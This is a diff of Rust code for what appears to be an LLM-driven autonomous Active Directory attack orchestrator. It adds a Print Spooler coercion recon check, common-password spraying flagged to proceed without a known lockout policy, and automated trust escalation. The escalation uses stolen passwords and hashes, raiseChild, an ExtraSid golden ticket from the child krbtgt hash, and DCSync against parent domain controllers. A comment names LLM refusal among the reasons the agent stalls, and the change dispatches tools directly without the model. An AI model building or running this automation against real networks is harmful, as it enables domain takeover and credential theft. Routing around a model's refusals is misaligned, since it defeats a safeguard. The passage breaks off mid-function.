+//! This is a recon bridge: it dispatches a check per host and registers
+//! `spooler_enabled` vulnerabilities that downstream coercion/CVE modules target.
+
+use std::sync::Arc;
+use std::time::Duration;
+
+use serde_json::json;
+use tokio::sync::watch;
+use tracing::{debug, info, warn};
+
+use crate::orchestrator::dispatcher::Dispatcher;
+use crate::orchestrator::state::*;
+
+fn collect_spooler_work(state: &StateInner) -> Vec<SpoolerWork> {
+    if state.credentials.is_empty() {
+        return Vec::new();
+    }
+
+    let mut items = Vec::new();
+
+    for host in &state.hosts {
+        let dedup_key = format!("spooler:{}", host.ip);
+        if state.is_processed(DEDUP_SPOOLER_CHECK, &dedup_key) {
+            continue;
+        }
+
+        let domain = host
+            .hostname
+            .find('.')
+            .map(|i| host.hostname[i + 1..].to_lowercase())
+            .unwrap_or_default();
+
+        let cred = state
+            .credentials
+            .iter()
+            .find(|c| !domain.is_empty() && c.domain.to_lowercase() == domain)
+            .or_else(|| state.credentials.first())
+            .cloned();
+
+        let cred = match cred {
+            Some(c) => c,
+            None => continue,
+        };
+
+        items.push(SpoolerWork {
+            dedup_key,
+            target_ip: host.ip.clone(),
+            hostname: host.hostname.clone(),
+            domain,
+            credential: cred,
+        });
+    }
+
+    items
+}
+
+/// Checks discovered hosts for Print Spooler service availability.
+/// Interval: 45s.
+pub async fn auto_spooler_check(dispatcher: Arc<Dispatcher>, mut shutdown: watch::Receiver<bool>) {
+    let mut interval = tokio::time::interval(Duration::from_secs(45));
+    interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay);
+
+    loop {
+        tokio::select! {
+            _ = interval.tick() => {},
+            _ = shutdown.changed() => break,
+        }
+        if *shutdown.borrow() {
+            break;
+        }
+
+        if !dispatcher.is_technique_allowed("spooler_check") {
+            continue;
+        }
+
+        let work: Vec<SpoolerWork> = {
+            let state = dispatcher.state.read().await;
+            collect_spooler_work(&state)
+        };
+
+        for item in work {
+            let payload = json!({
+                "technique": "spooler_check",
+                "target_ip": item.target_ip,
+                "hostname": item.hostname,
+                "domain": item.domain,
+                "credential": {
+                    "username": item.credential.username,
+                    "password": item.credential.password,
+                    "domain": item.credential.domain,
+                },
+            });
+
+            let priority = dispatcher.effective_priority("spooler_check");
+            match dispatcher
+                .throttled_submit("recon", "recon", payload, priority)
+                .await
+            {
+                Ok(Some(task_id)) => {
+                    info!(
+                        task_id = %task_id,
+                        target = %item.target_ip,
+                        hostname = %item.hostname,
+                        "Print Spooler check dispatched"
+                    );
+
+                    dispatcher
+                        .state
+                        .write()
+                        .await
+                        .mark_processed(DEDUP_SPOOLER_CHECK, item.dedup_key.clone());
+                    let _ = dispatcher
+                        .state
+                        .persist_dedup(&dispatcher.queue, DEDUP_SPOOLER_CHECK, &item.dedup_key)
+                        .await;
+
+                    // Register spooler_enabled vulnerability proactively so it
+                    // appears in reports. The agent's report_finding callback
+                    // only logs — this ensures the finding is durable.
+                    let vuln = ares_core::models::VulnerabilityInfo {
+                        vuln_id: format!("spooler_{}", item.target_ip.replace('.', "_")),
+                        vuln_type: "spooler_enabled".to_string(),
+                        target: item.target_ip.clone(),
+                        discovered_by: "auto_spooler_check".to_string(),
+                        discovered_at: chrono::Utc::now(),
+                        details: {
+                            let mut d = std::collections::HashMap::new();
+                            d.insert("target_ip".to_string(), json!(item.target_ip));
+                            d.insert("hostname".to_string(), json!(item.hostname));
+                            d.insert("domain".to_string(), json!(item.domain));
+                            d.insert(
+                                "description".to_string(),
+                                json!("Print Spooler service (MS-RPRN) is running.
Enables PrinterBug coercion and is a prerequisite for PrintNightmare (CVE-2021-1675)."), + ); + d + }, + recommended_agent: "privesc".to_string(), + priority: dispatcher.effective_priority("spooler_check"), + }; + + match dispatcher + .state + .publish_vulnerability_with_strategy( + &dispatcher.queue, + vuln, + Some(&dispatcher.config.strategy), + ) + .await + { + Ok(true) => { + info!( + target = %item.target_ip, + hostname = %item.hostname, + "Print Spooler enabled — vulnerability registered" + ); + } + Ok(false) => {} + Err(e) => { + warn!(err = %e, target = %item.target_ip, "Failed to publish spooler vulnerability"); + } + } + } + Ok(None) => { + debug!(target = %item.target_ip, "Spooler check deferred"); + } + Err(e) => { + warn!(err = %e, target = %item.target_ip, "Failed to dispatch spooler check"); + } + } + } + } +} + +struct SpoolerWork { + dedup_key: String, + target_ip: String, + hostname: String, + domain: String, + credential: ares_core::models::Credential, +} + +#[cfg(test)] +mod tests { + use super::*; + use crate::orchestrator::state::StateInner; + + fn make_credential( + username: &str, + password: &str, + domain: &str, + ) -> ares_core::models::Credential { + ares_core::models::Credential { + id: format!("c-{username}"), + username: username.into(), + password: password.into(), // pragma: allowlist secret + domain: domain.into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + } + } + + fn make_host(ip: &str, hostname: &str) -> ares_core::models::Host { + ares_core::models::Host { + ip: ip.to_string(), + hostname: hostname.to_string(), + os: String::new(), + roles: Vec::new(), + services: Vec::new(), + is_dc: false, + owned: false, + } + } + + #[test] + fn dedup_key_format() { + let key = format!("spooler:{}", "192.168.58.22"); + assert_eq!(key, "spooler:192.168.58.22"); + } + + #[test] + fn dedup_set_name() { + assert_eq!(DEDUP_SPOOLER_CHECK, "spooler_check"); + } + + #[test] + fn domain_from_hostname() { + let hostname = "srv01.contoso.local"; + let domain = hostname + .find('.') + .map(|i| hostname[i + 1..].to_lowercase()) + .unwrap_or_default(); + assert_eq!(domain, "contoso.local"); + } + + #[test] + fn collect_empty_state_returns_no_work() { + let state = StateInner::new("test-op".into()); + let work = collect_spooler_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_no_credentials_returns_no_work() { + let mut state = StateInner::new("test-op".into()); + state + .hosts + .push(make_host("192.168.58.22", "srv01.contoso.local")); + let work = collect_spooler_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_single_host_with_credential_produces_work() { + let mut state = StateInner::new("test-op".into()); + state + .hosts + .push(make_host("192.168.58.22", "srv01.contoso.local")); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_spooler_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].target_ip, "192.168.58.22"); + assert_eq!(work[0].hostname, "srv01.contoso.local"); + assert_eq!(work[0].domain, "contoso.local"); + assert_eq!(work[0].dedup_key, "spooler:192.168.58.22"); + assert_eq!(work[0].credential.username, "admin"); + } + + #[test] + fn collect_multiple_hosts_produces_work_for_each() { + let mut state = StateInner::new("test-op".into()); + state + .hosts + .push(make_host("192.168.58.22", "srv01.contoso.local")); + state + .hosts + 
.push(make_host("192.168.58.23", "srv02.contoso.local")); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_spooler_work(&state); + assert_eq!(work.len(), 2); + let ips: Vec<&str> = work.iter().map(|w| w.target_ip.as_str()).collect(); + assert!(ips.contains(&"192.168.58.22")); + assert!(ips.contains(&"192.168.58.23")); + } + + #[test] + fn collect_dedup_skips_already_processed_host() { + let mut state = StateInner::new("test-op".into()); + state + .hosts + .push(make_host("192.168.58.22", "srv01.contoso.local")); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state.mark_processed(DEDUP_SPOOLER_CHECK, "spooler:192.168.58.22".into()); + let work = collect_spooler_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_dedup_skips_processed_keeps_unprocessed() { + let mut state = StateInner::new("test-op".into()); + state + .hosts + .push(make_host("192.168.58.22", "srv01.contoso.local")); + state + .hosts + .push(make_host("192.168.58.23", "srv02.contoso.local")); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state.mark_processed(DEDUP_SPOOLER_CHECK, "spooler:192.168.58.22".into()); + let work = collect_spooler_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].target_ip, "192.168.58.23"); + } + + #[test] + fn collect_prefers_same_domain_credential() { + let mut state = StateInner::new("test-op".into()); + state + .hosts + .push(make_host("192.168.58.22", "srv01.contoso.local")); + state + .credentials + .push(make_credential("fabuser", "Fab!Pass1", "fabrikam.local")); // pragma: allowlist secret + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_spooler_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "admin"); + assert_eq!(work[0].credential.domain, "contoso.local"); + } + + #[test] + fn collect_falls_back_to_first_credential() { + let mut state = StateInner::new("test-op".into()); + state + .hosts + .push(make_host("192.168.58.22", "srv01.contoso.local")); + // Only fabrikam credential available for contoso host + state + .credentials + .push(make_credential("fabuser", "Fab!Pass1", "fabrikam.local")); // pragma: allowlist secret + let work = collect_spooler_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "fabuser"); + } + + #[test] + fn collect_host_without_fqdn_gets_empty_domain() { + let mut state = StateInner::new("test-op".into()); + state.hosts.push(make_host("192.168.58.22", "srv01")); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_spooler_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, ""); + // Falls back to first credential since domain is empty + assert_eq!(work[0].credential.username, "admin"); + } +} diff --git a/ares-cli/src/orchestrator/automation/stall_detection.rs b/ares-cli/src/orchestrator/automation/stall_detection.rs index 9b160bcf..181470ce 100644 --- a/ares-cli/src/orchestrator/automation/stall_detection.rs +++ b/ares-cli/src/orchestrator/automation/stall_detection.rs @@ -161,6 +161,7 @@ pub async fn auto_stall_detection( "target_ip": dc_ip, "domain": domain, "use_common_passwords": true, + "acknowledge_no_policy": true, }); match dispatcher diff 
--git a/ares-cli/src/orchestrator/automation/trust.rs b/ares-cli/src/orchestrator/automation/trust.rs index 598871ca..f46a018e 100644 --- a/ares-cli/src/orchestrator/automation/trust.rs +++ b/ares-cli/src/orchestrator/automation/trust.rs @@ -9,6 +9,7 @@ //! 3. **Trust follow**: When a trust account hash is found, dispatch inter-realm //! ticket creation and secretsdump against the foreign DC. +use std::collections::HashSet; use std::sync::Arc; use std::time::Duration; @@ -16,6 +17,8 @@ use serde_json::json; use tokio::sync::watch; use tracing::{debug, info, warn}; +use ares_llm::ToolCall; + use crate::orchestrator::dispatcher::Dispatcher; use crate::orchestrator::state::*; @@ -42,6 +45,150 @@ fn trust_account_name(flat_name: &str) -> String { format!("{}$", flat_name.to_uppercase()) } +/// Returns true when source and target are in different forests +/// (neither is a parent or child of the other, and they are not equal). +/// +/// Inter-forest trusts are subject to SID filtering on the target DC, which +/// strips ExtraSid claims with RID < 1000 (Enterprise Admins, Domain Admins, +/// Administrator). The inter-realm TGT authenticates but the privileged claim +/// is silently dropped — DCSync against the target DC then fails with +/// `rpc_s_access_denied`. This helper distinguishes the doomed path from +/// child→parent escalation (intra-forest), which is exploitable. +fn is_inter_forest(source: &str, target: &str) -> bool { + let s = source.to_lowercase(); + let t = target.to_lowercase(); + if s.is_empty() || t.is_empty() || s == t { + return false; + } + if s.ends_with(&format!(".{t}")) || t.ends_with(&format!(".{s}")) { + return false; + } + true +} + +/// Returns true if the trust source→target is inter-forest with SID filtering +/// active — meaning `forge_inter_realm_and_dump` will be rejected at DCSync +/// regardless of trust key validity. Caller should suppress the doomed +/// dispatch and accelerate cross-forest fallback paths instead. +/// +/// Decision tree: +/// - Intra-forest (child↔parent or same domain): false (raise_child handles it) +/// - Explicit `TrustInfo` with `is_cross_forest()` and `sid_filtering=true`: true +/// - Explicit `TrustInfo` with `is_cross_forest()` and `sid_filtering=false`: +/// false (someone disabled SID filtering — try the forge) +/// - No `TrustInfo` but the names are inter-forest: false (try the forge — +/// missing metadata means we can't be sure SID filtering is on, and the +/// ~30s cost of an unnecessary attempt is cheaper than silently dropping +/// a valid attack path on a misconfigured trust) +fn is_filtered_inter_forest_trust(state: &StateInner, source: &str, target: &str) -> bool { + if !is_inter_forest(source, target) { + return false; + } + let target_l = target.to_lowercase(); + // Look up only the target's metadata. `trusted_domains` is keyed by the + // foreign-side domain name in each enumeration result, so the entry for + // `target_l` describes the source→target relationship. Falling back to + // the source key returns *some other* trust the source happens to have + // (e.g. child→contoso parent_child stored under "contoso.local" + // when we query contoso→fabrikam), which would wrongly classify the + // unknown cross-forest path as intra-forest and let the doomed forge fire. + if let Some(t) = state.trusted_domains.get(&target_l) { + if t.is_cross_forest() { + return t.sid_filtering; + } + // Trust enumeration disagrees with name-based heuristic — trust the + // explicit metadata (e.g. 
unusual same-forest cross-DNS-suffix setup). + return false; + } + // No metadata — try the forge. False positives (SID filtering actually on) + // cost ~30s for a doomed DCSync attempt; false negatives (refusing a valid + // attack on a misconfigured trust where SID filtering is off) cost the + // entire foreign domain. Prefer the cheaper failure mode. + false +} + +/// Clear cross-forest fallback dedup keys for `target_domain` so the next +/// tick of `auto_cross_forest_enum`, `auto_foreign_group_enum`, and +/// `auto_acl_discovery` re-fires against the foreign forest with current +/// credentials. Called when a doomed forest_trust_escalation is suppressed +/// — the trust hash extraction usually populates new state (DC IPs, SIDs) +/// that should kick the fallbacks back into action. +async fn wake_cross_forest_fallbacks(dispatcher: &Dispatcher, target_domain: &str) { + let target_l = target_domain.to_lowercase(); + // (set_name, prefix) pairs — must stay in sync with the auto_*_enum + // dedup-key formats in their respective modules. + let mut prefixes: Vec<(&str, String)> = vec![ + (DEDUP_CROSS_FOREST_ENUM, format!("xforest:{target_l}:")), + ( + DEDUP_FOREIGN_GROUP_ENUM, + format!("foreign_group:{target_l}"), + ), + (DEDUP_ACL_DISCOVERY, format!("acl_disc:{target_l}:")), + ]; + + // ADCS dedup keys are `{host}:cred:{user@dom}` / `{host}:hash:{user@dom}`, + // keyed on the CA host (IP or hostname) — not the target domain. So for + // each known host that belongs to `target_domain`, add a `{host}:` prefix. + // This lets a freshly-acquired cross-forest credential re-attempt + // certipy_find against a fabrikam CA that was previously locked by a wrong + // initial cred. + { + let s = dispatcher.state.read().await; + let suffix = format!(".{target_l}"); + for h in s.hosts.iter() { + let hostname = h.hostname.to_lowercase(); + let belongs = + !hostname.is_empty() && (hostname == target_l || hostname.ends_with(&suffix)); + if !belongs { + continue; + } + if !h.ip.is_empty() { + prefixes.push((DEDUP_ADCS_SERVERS, format!("{}:", h.ip))); + } + prefixes.push((DEDUP_ADCS_SERVERS, format!("{hostname}:"))); + } + } + + let cleared: Vec<(&str, Vec<String>)> = { + let mut s = dispatcher.state.write().await; + prefixes + .iter() + .map(|(set, prefix)| (*set, s.unmark_processed_by_prefix(set, prefix))) + .filter(|(_, v)| !v.is_empty()) + .collect() + }; + let cleared_count: usize = cleared.iter().map(|(_, v)| v.len()).sum(); + if cleared_count == 0 { + // Nothing to clear means ACL/cross-forest enum never ran against this + // target — usually because no same-realm credential exists. Fallback + // wake is a no-op here; the orchestrator will keep flailing on + // NTLM-bound paths that 0x52e against the foreign forest. Logging + // this signal makes the architectural gap visible in the trace. + info!( + target = %target_domain, + "wake_cross_forest_fallbacks: no dedup keys to clear — \ + ACL/foreign-group/cross-forest enum never registered for this \ + target (likely no same-realm credential). Forge-only fallback \ + via create_inter_realm_ticket would be needed to bind LDAP \ + via Kerberos." + ); + } else { + info!( + target = %target_domain, + cleared_count, + "wake_cross_forest_fallbacks: cleared dedup keys to retrigger fallback enums" + ); + } + for (set, keys) in cleared { + for key in keys { + let _ = dispatcher + .state + .unpersist_dedup(&dispatcher.queue, set, &key) + .await; + } + } +} + +/// Check if a credential domain matches a target domain (exact, child, or parent).
fn is_domain_related(cred_domain: &str, target_domain: &str) -> bool { let cd = cred_domain.to_lowercase(); @@ -81,25 +228,38 @@ pub async fn auto_trust_follow(dispatcher: Arc<Dispatcher>, mut shutdown: watch: // Two dedup keys per domain: // trust_enum:<domain> — password-based attempt // trust_enum_hash:<domain> — hash-based retry (for dominated domains) - let enum_work: Vec<(String, String, String)> = state + // + // Iterate the union of `domain_controllers` keys and + // `dominated_domains`. The latter covers the case where a + // domain was compromised (e.g. via raise_child to the parent) + // but its DC was never explicitly seeded into + // `domain_controllers` — without this, parent-DC trust + // enumeration would never fire and cross-forest trusts would + // remain undiscovered. + let mut candidate_domains: HashSet<String> = state .domain_controllers + .keys() + .map(|d| d.to_lowercase()) + .collect(); + for d in state.dominated_domains.iter() { + candidate_domains.insert(d.to_lowercase()); + } + let enum_work: Vec<(String, String, String)> = candidate_domains .iter() - .filter(|(domain, _)| { - let key = trust_enum_dedup_key(domain, false); - let hash_key = trust_enum_dedup_key(domain, true); - !state.is_processed(DEDUP_TRUST_FOLLOW, &key) - || (!state.is_processed(DEDUP_TRUST_FOLLOW, &hash_key) - && state.dominated_domains.contains(&domain.to_lowercase())) - }) - .map(|(domain, dc_ip)| { - // Use hash_key if password-based was already tried + .filter_map(|domain| { + let dc_ip = state.resolve_dc_ip(domain)?; let pw_key = trust_enum_dedup_key(domain, false); - let key = if state.is_processed(DEDUP_TRUST_FOLLOW, &pw_key) { - trust_enum_dedup_key(domain, true) - } else { - pw_key - }; - (key, domain.clone(), dc_ip.clone()) + let hash_key = trust_enum_dedup_key(domain, true); + let pw_done = state.is_processed(DEDUP_TRUST_FOLLOW, &pw_key); + let hash_done = state.is_processed(DEDUP_TRUST_FOLLOW, &hash_key); + let dominated = state.dominated_domains.contains(domain); + // Skip if password attempt is done AND (no hash retry + // applies, or hash retry already done). + if pw_done && (!dominated || hash_done) { + return None; + } + let key = if pw_done { hash_key } else { pw_key }; + Some((key, domain.clone(), dc_ip)) }) .collect(); drop(state); @@ -164,39 +324,152 @@ pub async fn auto_trust_follow(dispatcher: Arc<Dispatcher>, mut shutdown: watch: }; if let Some(cred_json) = cred_payload { - let payload = json!({ - "techniques": ["enumerate_domain_trusts"], - "target_ip": dc_ip, + // Direct tool dispatch — bypass the LLM agent loop. + // The recon prompt template did not surface + // `credential.hash` (only password), so LLM-driven trust + // enumeration with hash auth would render an empty + // password and fail with LDAP 52e. The orchestrator + // already owns every input here; deliver them directly + // to enumerate_domain_trusts via dispatch_tool.
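// [Illustrative example — not part of the patch.] For a hash-auth
// credential borrowed from a sibling domain, the args assembled below
// would render roughly as:
//
//   {
//     "target": "192.168.58.10",
//     "domain": "fabrikam.local",
//     "username": "admin",
//     "hash": "aad3b435b51404eeaad3b435b51404ee:31d6...",
//     "bind_domain": "contoso.local"
//   }
//
// `password`/`hash` are emitted only when non-empty, and `bind_domain`
// only when the credential's domain differs from the enumeration target.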
+ let mut args = json!({ + "target": dc_ip, "domain": domain, - "credential": cred_json, + "username": cred_json + .get("username") + .and_then(|v| v.as_str()) + .unwrap_or(""), }); + if let Some(p) = cred_json + .get("password") + .and_then(|v| v.as_str()) + .filter(|s| !s.is_empty()) + { + args["password"] = json!(p); + } + if let Some(h) = cred_json + .get("hash") + .and_then(|v| v.as_str()) + .filter(|s| !s.is_empty()) + { + args["hash"] = json!(h); + } + if let Some(bd) = cred_json + .get("domain") + .and_then(|v| v.as_str()) + .filter(|s| !s.is_empty() && !s.eq_ignore_ascii_case(&domain)) + { + args["bind_domain"] = json!(bd); + } + + let call = ToolCall { + id: format!("trust_enum_{}", uuid::Uuid::new_v4().simple()), + name: "enumerate_domain_trusts".to_string(), + arguments: args, + }; + let task_id = format!( + "trust_enum_{}", + &uuid::Uuid::new_v4().simple().to_string()[..12] + ); - match dispatcher - .throttled_submit("recon", "recon", payload, 3) + // Mark dedup BEFORE spawn so the next 30s tick doesn't + // re-dispatch while enumeration is in flight. + dispatcher + .state + .write() .await - { - Ok(Some(task_id)) => { - info!( - task_id = %task_id, - domain = %domain, - auth = auth_method, - "Trust enumeration dispatched" - ); - dispatcher + .mark_processed(DEDUP_TRUST_FOLLOW, key.clone()); + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_TRUST_FOLLOW, &key) + .await; + + info!( + task_id = %task_id, + domain = %domain, + dc_ip = %dc_ip, + auth = auth_method, + "Dispatching enumerate_domain_trusts (direct tool, no LLM)" + ); + + let dispatcher_bg = dispatcher.clone(); + let domain_bg = domain.clone(); + let key_bg = key.clone(); + let auth_method_bg = auth_method.to_string(); + tokio::spawn(async move { + let result = dispatcher_bg + .llm_runner + .tool_dispatcher() + .dispatch_tool("recon", &task_id, &call) + .await; + // Failure handling depends on which auth attempt + // just failed: + // + // - password attempt: leave the dedup mark in place + // so the next 30s tick sees `pw_done=true` and + // escalates to the hash-key path (gated on the + // domain being in `dominated_domains`). Clearing + // the mark would loop forever on the same wrong + // sibling-domain credential. + // - hash attempt: clear so a future tick can retry + // if a fresh hash becomes available. + let clear_dedup = || async { + dispatcher_bg .state .write() .await - .mark_processed(DEDUP_TRUST_FOLLOW, key.clone()); - let _ = dispatcher + .unmark_processed(DEDUP_TRUST_FOLLOW, &key_bg); + let _ = dispatcher_bg .state - .persist_dedup(&dispatcher.queue, DEDUP_TRUST_FOLLOW, &key) + .unpersist_dedup( + &dispatcher_bg.queue, + DEDUP_TRUST_FOLLOW, + &key_bg, + ) .await; + }; + let on_failure = || async { + if auth_method_bg == "password" { + // Mark stays — escalation to hash retry on next tick. 
+ } else { + clear_dedup().await; + } + }; + match result { + Ok(exec_result) => { + if let Some(err) = exec_result.error.as_ref() { + warn!( + err = %err, + domain = %domain_bg, + auth = %auth_method_bg, + "enumerate_domain_trusts returned error" + ); + on_failure().await; + return; + } + let trust_count = exec_result + .discoveries + .as_ref() + .and_then(|d| d.get("trusted_domains")) + .and_then(|t| t.as_array()) + .map(|a| a.len()) + .unwrap_or(0); + info!( + domain = %domain_bg, + trust_count = trust_count, + "enumerate_domain_trusts completed" + ); + } + Err(e) => { + warn!( + err = %e, + domain = %domain_bg, + auth = %auth_method_bg, + "enumerate_domain_trusts dispatch errored" + ); + on_failure().await; + } } - Ok(None) => { - debug!(domain = %domain, "Trust enum throttled — deferred"); - } - Err(e) => warn!(err = %e, "Failed to dispatch trust enumeration"), - } + }); } } } @@ -204,47 +477,111 @@ pub async fn auto_trust_follow(dispatcher: Arc<Dispatcher>, mut shutdown: watch: // Child-to-parent escalation (ExtraSid via raiseChild) // - // When a parent_child trust is discovered and the child domain is dominated, - // dispatch a child_to_parent exploit task. The LLM prompt offers raiseChild - // (automated) and manual ExtraSid golden ticket as alternatives. + // Dispatches when a child domain is dominated and its parent FQDN is + // known. We derive the parent FQDN by stripping the leftmost label of + // the dominated child (always valid intra-forest — child FQDN is + // `{label}.{parent_fqdn}` by AD construction), then ALSO union with + // any explicit parent_child trusts discovered via LDAP enumeration. + // + // The intra-forest derivation lets us fire immediately on child DA, + // bypassing the trust enumeration round-trip — without it we'd block + // until `trusted_domains` was populated, which sometimes never + // happens (LLM refusal, network, throttle starvation). { let state = dispatcher.state.read().await; - if state.has_domain_admin && !state.trusted_domains.is_empty() { - let child_work: Vec<(String, String, String, String)> = state - .trusted_domains - .values() - .filter(|trust| trust.is_parent_child()) - .filter_map(|trust| { - let parent_domain = &trust.domain; + // Build the candidate child set as the union of dominated domains + // (krbtgt observed) and domains where we have a non-empty + // Administrator NTLM hash. The latter covers the common case where + // GOAD-style password reuse gives us a working DA hash via local + // SAM dumps before we ever DCSync krbtgt — without it the trust + // automation deadlocks waiting for krbtgt. + let mut candidate_children: HashSet<String> = state + .dominated_domains + .iter() + .map(|d| d.to_lowercase()) + .collect(); + for h in state.hashes.iter() { + if h.username.eq_ignore_ascii_case("administrator") + && h.hash_type.eq_ignore_ascii_case("NTLM") + && !h.hash_value.is_empty() + && !h.domain.is_empty() + { + candidate_children.insert(h.domain.to_lowercase()); + } + } + if !candidate_children.is_empty() { + let mut child_work: Vec<(String, String, String, String)> = Vec::new(); + + // Path A: derived intra-forest. For each candidate child (FQDN + // with 3+ labels), the parent is `labels[1..].join(".")`.
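// [Illustrative sketch — not part of the patch.] The Path A derivation
// in isolation, as a hypothetical free function:
//
//   fn derive_parent_fqdn(child: &str) -> Option<String> {
//       let labels: Vec<&str> = child.split('.').collect();
//       // Need 3+ labels so the derived parent keeps a dot:
//       // "dev.contoso.local" -> "contoso.local", but bare
//       // "contoso.local" has no intra-forest parent to derive.
//       if labels.len() < 3 {
//           return None;
//       }
//       Some(labels[1..].join("."))
//   }
//
//   assert_eq!(derive_parent_fqdn("dev.contoso.local").as_deref(), Some("contoso.local"));
//   assert_eq!(derive_parent_fqdn("contoso.local"), None);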
+ for child_domain in candidate_children.iter() { + let cd_lower = child_domain.to_lowercase(); + let labels: Vec<&str> = cd_lower.split('.').collect(); + if labels.len() < 3 { + continue; + } + let parent_domain = labels[1..].join("."); + if parent_domain.is_empty() || !parent_domain.contains('.') { + continue; + } + if state.dominated_domains.contains(&parent_domain) { + continue; + } + // Require parent DC IP resolvable (via domain_controllers + // or hosts table) so secretsdump has a target IP. + let parent_dc_ip = match state.resolve_dc_ip(&parent_domain) { + Some(ip) => ip, + None => continue, + }; + let key = format!("raise_child:{}", cd_lower); + if state.is_processed(DEDUP_TRUST_FOLLOW, &key) { + continue; + } + let child_dc_ip = match state.domain_controllers.get(&cd_lower) { + Some(ip) => ip.clone(), + None => continue, + }; + let _ = parent_dc_ip; // resolved later under fresh read lock + child_work.push((key, child_domain.clone(), parent_domain, child_dc_ip)); + } - // Skip if parent is already dominated + // Path B: explicit parent_child trusts from LDAP enumeration. + // Skip duplicates of Path A (same dedup key). + if !state.trusted_domains.is_empty() { + for trust in state.trusted_domains.values() { + if !trust.is_parent_child() { + continue; + } + let parent_domain = trust.domain.clone(); if state .dominated_domains .contains(&parent_domain.to_lowercase()) { - return None; + continue; } - - // Find a dominated child domain for this parent - // (child FQDN ends with .{parent}) - let child_domain = state.dominated_domains.iter().find(|d| { + let child_domain = match candidate_children.iter().find(|d| { d.to_lowercase() .ends_with(&format!(".{}", parent_domain.to_lowercase())) - })?; - + }) { + Some(d) => d.clone(), + None => continue, + }; let key = format!("raise_child:{}", child_domain.to_lowercase()); if state.is_processed(DEDUP_TRUST_FOLLOW, &key) { - return None; + continue; } + if child_work.iter().any(|(k, _, _, _)| k == &key) { + continue; + } + let child_dc_ip = + match state.domain_controllers.get(&child_domain.to_lowercase()) { + Some(ip) => ip.clone(), + None => continue, + }; + child_work.push((key, child_domain, parent_domain, child_dc_ip)); + } + } - let dc_ip = state - .domain_controllers - .get(&child_domain.to_lowercase()) - .cloned()?; - - Some((key, child_domain.clone(), parent_domain.clone(), dc_ip)) - }) - .collect(); drop(state); for (key, child_domain, parent_domain, dc_ip) in child_work { @@ -347,13 +684,24 @@ pub async fn auto_trust_follow(dispatcher: Arc<Dispatcher>, mut shutdown: watch: // Dispatch child-to-parent exploit task. The LLM prompt // offers raiseChild (automated) and manual ExtraSid golden // ticket creation as alternatives. + // `dc_ip` is the child DC (for trust key extraction). + // `target` should be the parent DC (for secretsdump after forging ticket). + // Use resolve_dc_ip so the hosts table fills in when + // domain_controllers lacks the parent — falls back to the + // child DC only as a last resort (DCSync can succeed + // against any writable DC in the parent domain).
+ let parent_dc_ip = { + let s = dispatcher.state.read().await; + s.resolve_dc_ip(&parent_domain) + .unwrap_or_else(|| dc_ip.clone()) + }; let mut payload = json!({ "technique": "create_inter_realm_ticket", "vuln_type": "child_to_parent", "domain": child_domain, "trusted_domain": parent_domain, "target_domain": parent_domain, - "target": &dc_ip, + "target": &parent_dc_ip, "dc_ip": dc_ip, "vuln_id": &vuln_id, }); @@ -363,50 +711,372 @@ pub async fn auto_trust_follow(dispatcher: Arc, mut shutdown: watch: payload[k] = v.clone(); } } - // Add domain SIDs if already resolved - { + // Add domain SIDs and child krbtgt (for ExtraSid via child + // krbtgt — preferred path, no inter-realm trust key needed). + // + // The ExtraSid attack requires the PARENT forest SID (RID 519 + // = Enterprise Admins). If we ship the child SID by mistake, + // the parent KDC rejects the ticket with KDC_ERR_PREAUTH_FAILED + // because the embedded SID doesn't resolve to a real EA group. + // So if the parent SID isn't cached, resolve it via lookupsid + // against the parent DC using child admin creds (cross-trust + // SAMR works) BEFORE dispatching the exploit task. Defer the + // dispatch (no dedup mark) when resolution fails so the next + // 30s tick can retry once host scans / DC enumeration progress. + let parent_lower = parent_domain.to_lowercase(); + let cd_lower = child_domain.to_lowercase(); + let ( + mut have_target_sid, + mut have_source_sid, + child_admin_cred, + child_admin_hash, + child_dc_ip, + ) = { let s = dispatcher.state.read().await; - if let Some(sid) = s.domain_sids.get(&child_domain.to_lowercase()) { + if let Some(sid) = s.domain_sids.get(&cd_lower) { payload["source_sid"] = json!(sid); } - if let Some(sid) = s.domain_sids.get(&parent_domain.to_lowercase()) { + if let Some(sid) = s.domain_sids.get(&parent_lower) { payload["target_sid"] = json!(sid); } - } + if let Some(child_krbtgt) = s.hashes.iter().find(|h| { + h.username.eq_ignore_ascii_case("krbtgt") + && h.domain.to_lowercase() == cd_lower + && h.hash_type.to_uppercase() == "NTLM" + }) { + payload["child_krbtgt_hash"] = json!(child_krbtgt.hash_value); + } + let admin_cred = s + .credentials + .iter() + .find(|c| { + c.is_admin + && !c.password.is_empty() + && c.domain.to_lowercase() == cd_lower + }) + .cloned(); + let admin_hash = s + .hashes + .iter() + .find(|h| { + h.username.to_lowercase() == "administrator" + && h.domain.to_lowercase() == cd_lower + && h.hash_type.to_uppercase() == "NTLM" + }) + .cloned(); + let child_dc = s.resolve_dc_ip(&child_domain); + ( + s.domain_sids.contains_key(&parent_lower), + s.domain_sids.contains_key(&cd_lower), + admin_cred, + admin_hash, + child_dc, + ) + }; - match dispatcher - .throttled_submit("exploit", "privesc", payload, 1) + if !have_target_sid { + if let Some((sid, admin_name)) = super::golden_ticket::resolve_domain_sid( + &parent_domain, + &parent_dc_ip, + child_admin_cred.as_ref(), + child_admin_hash.as_ref(), + ) .await - { - Ok(Some(task_id)) => { + { info!( - task_id = %task_id, + parent_domain 